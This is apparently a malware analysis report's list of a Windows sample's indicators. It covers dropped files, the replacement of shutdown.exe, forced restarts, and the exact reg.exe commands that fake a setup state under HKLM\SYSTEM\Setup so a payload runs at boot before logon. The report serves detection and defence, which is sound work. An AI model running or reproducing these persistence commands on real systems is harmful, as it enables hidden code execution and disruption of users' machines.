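Technical Information
(The section labels for the list below are missing from this copy. Read "X with Y" entries as a file being replaced, "from X to Y" entries as a file being moved or copied, and quoted command lines as processes that were launched. For bare paths the operation is not stated; part0.bat is listed twice, presumably under two different labels.)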
- <SYSTEM32>\shutdown.exe with %TEMP%\ixp000.tmp\shutdown.exe
- %TEMP%\ixp000.tmp\part0.bat
- %TEMP%\ixp000.tmp\part1.bat
- %TEMP%\ixp000.tmp\part2.exe
- %TEMP%\ixp000.tmp\shutdown.exe
- %TEMP%\ixp000.tmp\shutdown32.exe
- %TEMP%\ixp000.tmp\part0.bat
- from %TEMP%\ixp000.tmp\part1.bat to %WINDIR%\temp\part1.bat
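- from %TEMP%\ixp000.tmp\part2.exe to %WINDIR%\temp\part2.bat (destination extension as given in the report; the registry CmdLine value and the last command line both reference %WINDIR%\Temp\part2.exe, so check for both file names)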
- from %TEMP%\ixp000.tmp\shutdown32.exe to <SYSTEM32>\shutdown32.exe
- '<SYSTEM32>\shutdown.exe' -r -f -t 0
- '<SYSTEM32>\shutdown32.exe' -r -f -t 0
- '<SYSTEM32>\cmd.exe' /c part0.bat
- '<SYSTEM32>\cmd.exe' /K %WINDIR%\Temp\part1.bat
- '<SYSTEM32>\reg.exe' query "HKU\S-1-5-19\Environment"
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\Setup" /v "CmdLine" /t REG_SZ /d "cmd /c %WINDIR%\Temp\part2.exe" /f
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\Setup" /v "OOBEInProgress" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\Setup" /v "RestartSetup" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\Setup" /v "SetupPhase" /t REG_DWORD /d "3" /f
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\Setup" /v "SetupType" /t REG_DWORD /d "2" /f
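- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\Setup" /v "SystemSetupInProgress" /t REG_DWORD /d "1" /f
  (Note: taken together, these HKLM\SYSTEM\Setup values mark the machine as being in Windows setup, so the CmdLine value, here part2.exe, is run at the next boot before any user logs on; the forced restarts listed above trigger that boot. Writes to CmdLine, SetupType or SystemSetupInProgress under this key outside an OS installation or upgrade are worth alerting on.)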
- '<SYSTEM32>\cmd.exe' /c %WINDIR%\Temp\part2.exe